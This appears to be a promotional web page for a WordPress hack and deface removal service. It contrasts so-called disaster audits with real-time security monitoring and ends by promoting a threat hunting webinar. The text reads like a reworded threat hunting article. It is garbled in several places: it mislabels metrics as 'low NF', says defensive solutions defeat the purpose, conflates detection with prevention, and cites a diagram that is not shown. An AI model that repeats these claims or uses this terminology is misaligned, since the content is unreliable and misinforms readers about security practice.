When you enlist our EUROPEAN EMERGENCY WordPress Services team to run disaster audits, it’s important to determine which solutions and processes we're using to actively identify threats. After all, disaster audits (WordPress hack removal, WordPress deface removal) are reactive efforts to detect persistent threats that have evaded existing security controls. You must adopt the mindset that your existing controls have already failed – which means using defensive solutions really defeats the purpose of the identification process.
Let’s take a closer look at the difference between disaster audits and real-time security solutions. Security solutions, like real-time monitoring, focus more on capturing low false positive (FP) alerting. The goal of real-time monitoring is to keep these false positives low and to sound the alarm for actual security incidents.
On the opposite side, disaster auditing tools are geared to pull and mine as much data as possible. False positives aren’t normally a big concern. When there is a higher number of false positives that occur in the subset of data, that the WordPress Services team examined over the course of a few days, these patterns form the basis of a lead.
Ultimately, disaster audits and disaster detection (more accurately disaster prevention) is not the same thing. This is a big misconception. When it comes to disaster audits, you are not waiting for alarms to go off, which is what real-time security solutions are all about. You’re welcoming low false negatives (FN). The diagram below represents where the focus of disaster audit data should fall – between the good (low FP) and bad (low NF).
Anomalies, outliers, and suspicious activities are leads that need to be scored. Disaster audits should have enough data to conduct their own investigation and audits without having to rely on tools that flag potential incidents. The goal of any disaster audit is to triage those leads to find threats they couldn’t find before.
What are some of the other tools and techniques you should ensure your hunt teams are using to successfully hunt down malicious threats? In the webinar, “Threat Hunting Versus Compromise Assessments: What’s the Difference?” Infocyte Founder and Chief Product Officer Chris Gerritz and Andrew Cook from Delta Risk discuss various hunt methodologies that hunt teams can employ. View it on-demand at this CYBER SECURITY WEBINAR.